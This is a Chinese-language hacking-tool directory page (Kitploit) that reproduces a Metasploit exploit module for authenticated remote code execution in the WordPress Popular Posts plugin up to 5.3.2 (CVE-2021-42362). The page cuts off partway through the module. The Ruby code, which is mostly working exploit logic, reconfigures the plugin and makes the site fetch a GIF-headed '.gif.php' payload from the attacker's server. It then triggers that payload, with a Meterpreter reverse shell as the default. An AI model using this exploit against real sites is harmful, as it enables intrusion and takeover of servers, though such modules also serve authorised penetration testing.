Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
nate158g-m-w-n-l-p-d-a-o-e — ### 此模块需要 Metasploit:https://metasploit.com/download# 当前源代码:https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ 此漏洞利用需要 Metasploit 具有 FQDN,并且能够在端口 80、443 或 8080 上运行载荷 Web 服务器。 FQDN 还必须不解析到保留地址(192/172/127/10)。服务器还必须在收到 GET 请求之前响应载荷的 HEAD 请求。 此漏洞利用利用了 WordPress 插件 Popular Posts <= 5.3.2 中经过身份验证的不当输入验证。 漏洞利用链相当复杂。需要身份验证,并且服务器上需要 PHP 的 'gd' 扩展。 然后重新配置 Popular Post 插件,以允许在 widget 中为帖子图像使用任意 URL。 发布帖子,然后向帖子发送请求,使其比之前的 #1 热门 5 次。一旦 帖子进入前 5 名,并且在 60 秒(我们等待 90 秒)服务器缓存刷新后,主页 widget 被加载, 这会触发插件从我们的服务器下载载荷。我们的载荷具有 'GIF' 头,并且是 双扩展名('.gif.php'),允许执行任意 PHP 代码。 }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf 模块 'Simone Cristofaro', # edb 'Jerome Bruandet' # 原始分析 ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo | Kitploit
工具/GitHubGitHub/nate0634034090/nate158g-m-w-n-l-p-d-a-o-e
渗透测试框架漏洞利用框架Payload生成漏洞分析Web应用程序漏洞利用红队
GitHubnate0634034090/nate158g-m-w-n-l-p-d-a-o-e

nate158g-m-w-n-l-p-d-a-o-e

查看仓库
124404年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

关于

### 此模块需要 Metasploit:https://metasploit.com/download# 当前源代码:https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ 此漏洞利用需要 Metasploit 具有 FQDN,并且能够在端口 80、443 或 8080 上运行载荷 Web 服务器。 FQDN 还必须不解析到保留地址(192/172/127/10)。服务器还必须在收到 GET 请求之前响应载荷的 HEAD 请求。 此漏洞利用利用了 WordPress 插件 Popular Posts <= 5.3.2 中经过身份验证的不当输入验证。 漏洞利用链相当复杂。需要身份验证,并且服务器上需要 PHP 的 'gd' 扩展。 然后重新配置 Popular Post 插件,以允许在 widget 中为帖子图像使用任意 URL。 发布帖子,然后向帖子发送请求,使其比之前的 #1 热门 5 次。一旦 帖子进入前 5 名,并且在 60 秒(我们等待 90 秒)服务器缓存刷新后,主页 widget 被加载, 这会触发插件从我们的服务器下载载荷。我们的载荷具有 'GIF' 头,并且是 双扩展名('.gif.php'),允许执行任意 PHP 代码。 }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf 模块 'Simone Cristofaro', # edb 'Jerome Bruandet' # 原始分析 ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo

分享

nate158g-m-w-n-l-p-d-a-o-e### 此模块需要 Metasploit:https://metasploit.com/download

当前来源:https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking

prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress

def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Popular Posts 插件认证远程代码执行', 'Description' => %q{ 此漏洞利用要求 Metasploit 拥有一个 FQDN,并且能够运行端口 80、443 或 8080 上的有效载荷 Web 服务器。 FQDN 还必须不能解析为保留地址(192/172/127/10)。 服务器还必须在收到 GET 请求之前响应 HEAD 请求 以获取有效载荷。 此漏洞利用在 WordPress 插件 Popular Posts <= 5.3.2 中利用了一个认证后的不当输入验证。 利用链相当复杂。 需要认证,并且服务器上需要安装 PHP 的 'gd' 扩展。 然后重新配置 Popular Posts 插件,允许在 Widget 中使用任意 URL 作为帖子图片。 创建一个帖子,然后向该帖子发送请求,使其比之前的 #1 帖子多 5 次。一旦 帖子进入前 5 名,并且在 60 秒(我们等待 90 秒)的服务器缓存刷新后,主页 Widget 被加载, 这将触发插件从我们的服务器下载有效载荷。 我们的有效载荷具有 'GIF' 头部,以及一个 双扩展名('.gif.php'),允许执行任意 PHP 代码。 }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf 模块 'Simone Cristofaro', # edb 'Jerome Bruandet' # 原始分析 ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ '自动目标', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 分钟,其他访问站点的访问者可能触发 }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, '用户账户的用户名', 'admin']), OptString.new('PASSWORD', [true, '用户账户的密码', 'admin']), OptString.new('TARGETURI', [true, 'WordPress 服务器的基本路径', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'Metasploit 服务器的 FQDN。不能解析为保留地址(192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, '要监听的本地端口。', 'login', ['80', '443', '8080']]), ] end

def check return CheckCode::Safe('未检测到 WordPress。') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts 不是易受攻击的版本') end return checkcode end

def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # 循环 5 次,以防服务器写入文件时存在时间延迟 (1..5).each do |i| print_status("触发 Shell 位于:#{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)},10 秒后。尝试第 #{i} 次(共 5 次)") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('未找到有效载荷,可能未正确上传。') end end

def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('响应初始 HEAD 请求(通过检查 1)') # 根据 https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests 我们应该有一个有效的 Content-Length # 但它是动态计算的,因为这个响应被覆盖为 0。此处留作注释。 # 另外不想在正文中发送真实的有效载荷来使大小正确,因为那样会增加被捕获的机会 return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('响应 GET 请求(通过检查 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # 出于某种奇怪原因,我们需要手动关闭连接,以便 PHP/WP 完成其功能 Rex.sleep(2) # 等待 WP 完成所有需要的检查 trigger_payload(on_disk_payload_name) end print_status("收到意外的 #{request.method} 请求") end

def check_gd_installed(cookie) vprint_status('检查是否安装了 gd') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, '站点无响应') unless res fail_with(Failure::UnexpectedReply, '无法检索页面') unless res.code == 200 res.body.include? ' gd' end

def get_wpp_admin_token(cookie) vprint_status('检索 wpp_admin 令牌') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, '站点无响应') unless res fail_with(Failure::UnexpectedReply, '无法检索页面') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end

def change_settings(cookie, token) vprint_status('更新热门帖子设置(图片)') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, '站点无响应') unless res fail_with(Failure::UnexpectedReply, '无法检索页面') unless res.code == 200 fail_with(Failure::UnexpectedReply, '无法保存/更改设置') unless /<strong>设置已保存/ =~ res.body end

def clear_cache(cookie, token) vprint_status('清除图片缓存') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, '站点无响应') unless res fail_with(Failure::UnexpectedReply, '无法检索页面') unless res.code == 200 end

下载工具